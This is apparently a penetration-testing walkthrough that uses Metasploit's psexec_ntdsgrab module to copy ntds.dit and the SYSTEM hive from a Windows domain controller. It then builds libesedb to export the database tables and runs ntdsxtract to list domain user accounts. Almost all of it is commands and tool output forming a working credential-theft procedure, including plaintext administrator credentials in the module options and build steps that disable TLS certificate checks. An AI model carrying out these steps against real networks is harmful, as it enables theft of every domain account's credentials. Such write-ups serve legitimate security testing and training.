
metasploit - psexec_ntdsgrab / libesedb / ntdsxtract

psexec_ntdsgrab

msf auxiliary(psexec_ntdsgrab) > show options 

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CREATE_NEW_VSC        false            no        If true, attempts to create a volume shadow copy
   RHOST                     yes       The target address
   RPORT                               yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             PENTEST.COM      no        The Windows domain to use for authentication
   SMBPass               pass1234PASS~    no        The password for the specified username
   SMBSHARE              C$               yes       The name of a writeable share on the server
   SMBUser               administrator    no        The username to authenticate as
   VSCPATH                                no        The path to the target Volume Shadow Copy
   WINPATH               Windows          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf auxiliary(psexec_ntdsgrab) > run

[*] : - Checking if a Volume Shadow Copy exists already.
[+] : - Service start timed out, OK if running a command or non-service executable...
[+] : - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] : - Service start timed out, OK if running a command or non-service executable...
[*] : - Checking if NTDS.dit was copied.
[+] : - Service start timed out, OK if running a command or non-service executable...
[+] : - Service start timed out, OK if running a command or non-service executable...
[*] : - Downloading ntds.dit file
[+] : - ntds.dit stored at /home/notfound/.msf4/loot/_default_192_psexec.ntdsgrab._865816.dit
[*] : - Downloading SYSTEM hive file
[+] : - SYSTEM hive stored at /home/notfound/.msf4/loot/_default_192_psexec.ntdsgrab._928081.bin
[*] : - Executing cleanup...
[*] : - Cleanup was successful
[*] Auxiliary module execution completed
           

Install libesedb (note: the `wget --no-check-certificate` and `git config --global http.sslverify false` steps below disable TLS certificate verification, the latter for every git operation on the box, so revert that setting once the build is done)

root:/ /# uname -a
Linux kali -kali1--pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
           
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh
root:/tmp/ntds /# git config --global http.sslverify false
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install
           
root:/tmp/ntds /# esedbexport _default_192_psexec.ntdsgrab._865816.dit 
esedbexport: error while loading shared libraries: libesedb.so: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig
root:/tmp/ntds /# esedbexport _default_192_psexec.ntdsgrab._865816.dit 
esedbexport 

Opening file.
Exporting table  (MSysObjects) out of 
Exporting table  (MSysObjectsShadow) out of 
Exporting table  (MSysUnicodeFixupVer2) out of 
Exporting table  (datatable) out of 
Exporting table  (hiddentable) out of 
Exporting table  (link_table) out of 
Exporting table  (sdpropcounttable) out of 
Exporting table  (sdproptable) out of 
Exporting table  (sd_table) out of 
Exporting table  (MSysDefrag1) out of 
Exporting table  (quota_table) out of 
Exporting table  (quota_rebuild_progress_table) out of 
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total 
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root  9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root     1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root    72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root      613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root    42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root     1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root     5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root       57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root    69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root      103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x  root root      Sep  : ntdsxtract
-rw-r--r-- 1 root root    57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root      152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root       80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root      771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root   180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root    75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root     3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root    23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root       14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root       96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root   182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root    50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root    67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /# 
           

NTDSXTRACT

root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
           
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./

[+] Started at: Sat,  Sep  :: UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage )...
[!] Warning: Opening saved maps failed: [Errno ] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - % ->  records processed
[+] Sanity checks...
      Schema record id: 
      Schema type id: 
[+] Extracting schema information - % ->  records processed
[+] Loading saved map files (Stage )...
[!] Warning: Opening saved maps failed: [Errno ] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...

List of users:
==============
Record ID:            
User name:            Administrator
User principal name:  
SAM Account name:     Administrator
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 b36f08b-c8cf-eab--ae1bdce0e4f6
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    -- ::+:
Last logon:           -- ::+:
Last logon timestamp: -- ::+:
Bad password time     -- ::+:
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Administrator

Record ID:            
User name:            Guest
User principal name:  
SAM Account name:     Guest
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 d3b8bbf-d0a--fa-ecdf0d68b2b9
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    PWD_NOTREQD
    NORMAL_ACCOUNT
    DONT_EXPIRE_PASSWORD
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, Guest

Record ID:            
User name:            krbtgt
User principal name:  
SAM Account name:     krbtgt
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 d4a001b1-d6f---b50ed442416
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    -- ::+:
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    ACCOUNTDISABLE
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, krbtgt

Record ID:            
User name:            python
User principal name:  
SAM Account name:     python
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 ---a98b-c9c797769ebc
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    -- ::+:
Last logon:           -- ::+:
Last logon timestamp: -- ::+:
Bad password time     -- ::+:
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, python

Record ID:            
User name:            juzi
User principal name:  
SAM Account name:     juzi
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 b29311a1-a-a8c-a292-f623ad2969b
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    -- ::+:
Last logon:           -- ::+:
Last logon timestamp: -- ::+:
Bad password time     -- ::+:
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, juzi

Record ID:            
User name:            jin
User principal name:  
SAM Account name:     jin
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 b53357-d35c--a239-cd930497bf7a
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    -- ::+:
Last logon:           -- ::+:
Last logon timestamp: -- ::+:
Bad password time     Never
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, jin

Record ID:            
User name:            debug
User principal name:  
SAM Account name:     debug
SAM Account type:     SAM_NORMAL_USER_ACCOUNT
GUID:                 da9cb--ec8-b2b1-b2505521db
SID:                  S-------
When created:         -- ::+:
When changed:         -- ::+:
Account expires:      Never
Password last set:    -- ::+:
Last logon:           -- ::+:
Last logon timestamp: -- ::+:
Bad password time     Never
Logon count:          
Bad password count:   
Dial-In access perm:  Controlled by policy
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$, COM, PENTEST, Users, debug
           

References

http://www.ntdsxtract.com/

https://github.com/libyal/libesedb/